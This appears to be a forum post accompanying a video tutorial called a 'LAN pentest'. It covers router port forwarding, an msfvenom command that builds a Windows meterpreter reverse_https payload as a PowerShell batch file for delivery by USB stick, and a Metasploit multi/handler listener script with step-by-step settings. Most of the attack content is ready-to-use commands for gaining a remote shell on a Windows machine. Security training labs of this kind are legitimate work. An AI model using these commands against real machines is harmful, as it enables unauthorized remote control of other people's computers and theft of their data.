Home
Latest images
Search
Register
Log in
by 22. Lan Pentest Preparing Router, Payload, & Listener
----
*N300 Wifi Router with the grooves in the Wifi Router was the one I used in this video, if you want your 2ndary Router Setup to look exactly as mine did within the video, I suggest using the same router, because some router's don't support Port Forwarding as easily as this one does. I spent around $20 to purchase this Router from Ebay. It's very cheap when compared to some Routers.*
Lan, Local Area Network Payload
1. ifconfig = visit your router's page, you will find most of the address under the inet section of your interface, except for the last group of numbers. for example 198.168.220.X
2. Forward the ports as "tcp" through the 2nd or both of your routers.
This test can be done offline, if you connect your computers to the 2nd router, and do not connect the 2nd router to the Internet.
3. This test can be done onine using both of your routers if you connect your 2nd router to your first router.
In order to do this, you must port forward from first router to the 2nd router, then from the 2nd router to your Linux Pc.
4. Port forward from the 1st Router to 2nd router.
5. Port Forward to the Linux Pc from the 2nd Router. Once you get all the necessary ports forwarded as is done in the video you can proceed with the steps of creating a raw payload file below.
1. msfvenom -p windows/meterpreter/reverse_https LHOST=0.0.0.0 LPORT=0000 -f psh-cmd -o ~/Desktop/f/lfile.bat = creates a payload with the lowercase "-p" sets the local ip of your linux machine in the LHOST, the port you have forwarded to it with LPORT, saves as a raw payload filetype of Powershell-command prompt saves file to your Linux Desktop's f folder that must be pre-created before creating the payload using mkdir command or by right clicking on your Desktop and selecting create new folder, then naming it "f".
2. copy the raw payload to your Usb Stick, then unmount it from linux so it will be usable with Windows.
3. create a folder on your Desktop called, "rc", then navigate to it.
4. nano file.rc = opens the nano editor with a potentially new file.rc file.
file.rc should contain the following script.
=*=
- Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 0000
set ReverseListenerBindAddress 0.0.0.0
set ExitOnSessions false
exploit -j -z
"Ctrl+Shift+T" open a new terminal tab.
5. msfconsole = start metasploit, if it fails be persistent until it starts.
6. use exploit/multi/handler = set the multi handler, You may see a different banner than I do, don't worry about it.
7. set payload windows/meterpreter/reverse_https = set the Payload to for the listener to listen for a connection on.
8. options = see what are the required options for this specific payload.
9. set LHOST 0.0.0.0 = This should be our Local Linux Pc's Ip Address that can be obtained by looking at the interface you are connected to using "ifconfig" and looking for the ip address.
10. set LPORT 0000 = set the port that you forwarded through your router, or routers.
11. set ReverseListenerBindAddress 0.0.0.0 = this also is your Local Ip Address of your Linux Pc, that can be obtained with "ifconfig" as mentioned earlier.
12. set ExitOnSessions false
13. exploit -j -z = tells msfconsole to connect to new connections, then place them in the "background" leaving it connected until you're ready to proceed, still while looking for other connections that may happen (if you are listening for multiple pc connections for example,
or want to look at a connection to make sure
it's the right one before connecting to it.
Extra information that's not really relevent.
1. msfvenom -? = brings the msfvenom help page up.
2. msfvenom -l >> ~/Desktop/Payloadoptions = brings up msfvenom payload list and saves it to a file called Payload options on your Desktop. (may need to enter this command several times until it successfully brings back the Payload list.)
3. You can open PayloadOptions file, and search for windows/meterpreter/reverse = to find the payload that we are using, and read about it slightly as I did in the video.
4. msfvenom --help-formats = views the possible output formats for msfvenom, we used psh-cmd but there are several other possible formats that can be used with different Payloads, you'll have to seek them out online and read about them to learn more, Some Payloads may be too large for our psh-cmd format, the reason I am showing you this extra info is to help you gain a better understanding of how it all works.
